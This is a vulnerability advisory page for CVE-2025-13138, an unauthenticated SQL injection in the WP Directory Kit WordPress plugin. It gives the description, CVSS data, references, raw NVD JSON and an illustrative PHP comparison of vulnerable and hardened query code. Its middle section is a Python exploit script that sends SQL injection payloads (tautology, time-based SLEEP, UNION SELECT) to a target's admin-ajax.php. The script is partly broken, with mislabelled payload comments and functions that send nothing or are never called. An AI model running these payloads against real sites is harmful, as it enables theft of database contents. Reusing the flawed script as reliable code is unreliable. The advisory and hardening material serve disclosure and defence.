Security Vulnerability Report
CVE-2025-13138 CVSS 7.5 HIGH

CVE-2025-13138

Published: 2025-11-21 10:15:49
Last Modified: 2026-04-15 00:35:42

Description

The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'columns_search' parameter of the select_2_ajax() function in all versions up to, and including, 1.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
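As an added illustration, not the plugin's own code and not taken from the advisory above, the bug class the description names (a request-controlled `columns_search` value concatenated into the SQL text) is shown beside a hardened handler that allowlists the identifier and binds the search value with `$wpdb->prepare()`. The function names, the `wdk_items` table, the `q` request field and the column allowlist are assumptions, as is the reading of `columns_search` as a column identifier.

```php
<?php
// Illustrative code only (assumed names); it is not the WP Directory Kit source.

// VULNERABLE PATTERN: the column identifier and the search term both come from
// the request and are interpolated into the query text, so an unauthenticated
// caller can change the structure of the query (CWE-89).
function wdk_example_select2_vulnerable() {
    global $wpdb;
    $column = $_POST['columns_search'] ?? 'title';
    $term   = $_POST['q'] ?? '';
    $sql = "SELECT id, title FROM {$wpdb->prefix}wdk_items "
         . "WHERE {$column} LIKE '%{$term}%' LIMIT 20";
    wp_send_json( $wpdb->get_results( $sql ) ); // raw interpolated SQL
}

// HARDENED PATTERN: identifiers cannot be bound as placeholders, so the column
// is checked against a fixed allowlist; the value goes through
// $wpdb->prepare() and LIKE metacharacters are escaped with $wpdb->esc_like().
function wdk_example_select2_hardened() {
    global $wpdb;
    $allowed = array( 'title', 'city', 'category' ); // assumed column names
    $column  = sanitize_key( $_POST['columns_search'] ?? 'title' );
    if ( ! in_array( $column, $allowed, true ) ) {
        wp_send_json_error( 'invalid column', 400 ); // reject, do not "clean"
    }
    $term  = sanitize_text_field( wp_unslash( $_POST['q'] ?? '' ) );
    $like  = '%' . $wpdb->esc_like( $term ) . '%';
    $table = $wpdb->prefix . 'wdk_items';
    $sql   = $wpdb->prepare(
        "SELECT id, title FROM {$table} WHERE {$column} LIKE %s LIMIT %d",
        $like,
        20
    );
    wp_send_json( $wpdb->get_results( $sql ) );
}

// Register only the hardened handler for both logged-in and anonymous callers.
add_action( 'wp_ajax_wdk_example_select2', 'wdk_example_select2_hardened' );
add_action( 'wp_ajax_nopriv_wdk_example_select2', 'wdk_example_select2_hardened' );
```

When the allowlist check fails the handler returns an error rather than falling back to a default column, so a malformed identifier is visible in logs instead of silently succeeding.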

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Directory Kit <= 1.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-13138 SQL Injection PoC
# Target: WordPress with WP Directory Kit plugin <= 1.4.3
# Vulnerability: Unauthenticated SQL Injection via columns_search parameter


def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection in WP Directory Kit plugin
    The vulnerability exists in select_2_ajax() function
    """
    # Construct the AJAX endpoint
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"

    # Prepare the malicious request
    data = {
        'action': 'wdk_select_2_ajax',
        'columns_search': payload,
        'table': 'wdk_settings',
        'limit': 1
    }

    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"


def test_blind_sqli(target_url):
    """
    Test for blind SQL injection vulnerability
    Using time-based blind injection technique
    """
    # True condition - should respond quickly
    true_payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(0))a) AND '1'='1"
    # False condition - should respond quickly (no delay)
    false_payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a) AND '1'='2"

    print(f"[*] Testing blind SQL injection on {target_url}")
    print(f"[*] True condition payload: {true_payload}")
    print(f"[*] False condition payload: {false_payload}")
    # Note: In a real attack, timing analysis would be performed here
    print("[*] Blind SQL injection test completed")


def extract_database_info(target_url):
    """
    Extract database information using UNION-based injection
    """
    # Example UNION-based injection to extract database name
    union_payload = "1' UNION SELECT database()-- -"
    print("[*] Attempting to extract database information")
    result = exploit_sqli(target_url, union_payload)
    print(f"[*] Database info: {result[:200]}...")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-13138.py <target_url>")
        print("Example: python cve-2025-13138.py http://example.com")
        sys.exit(1)

    target = sys.argv[1]

    # Test basic exploitation
    print("=" * 60)
    print("CVE-2025-13138 WP Directory Kit SQL Injection Exploit")
    print("=" * 60)

    # Basic test
    basic_payload = "1' OR '1'='1"
    print(f"[*] Sending basic test payload: {basic_payload}")
    result = exploit_sqli(target, basic_payload)
    print(f"[*] Response length: {len(result)} characters")

    # Test blind injection
    test_blind_sqli(target)

    print("\n[*] Exploitation complete")
    print("[*] Note: This is a proof-of-concept for educational purposes only")
```

References

https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.3/application/controllers/Wdk_frontendajax.php#L546
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail=
https://wordpress.org/plugins/wpdirectorykit/
https://www.wordfence.com/threat-intel/vulnerabilities/id/0cad8c48-5c96-484c-acda-b33d8d8d10d3?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13138",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-21T10:15:48.593",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'columns_search' parameter of the select_2_ajax() function in all versions up to, and including, 1.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/wpdirectorykit/tags/1.4.3/application/controllers/Wdk_frontendajax.php#L546",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/wpdirectorykit/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0cad8c48-5c96-484c-acda-b33d8d8d10d3?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```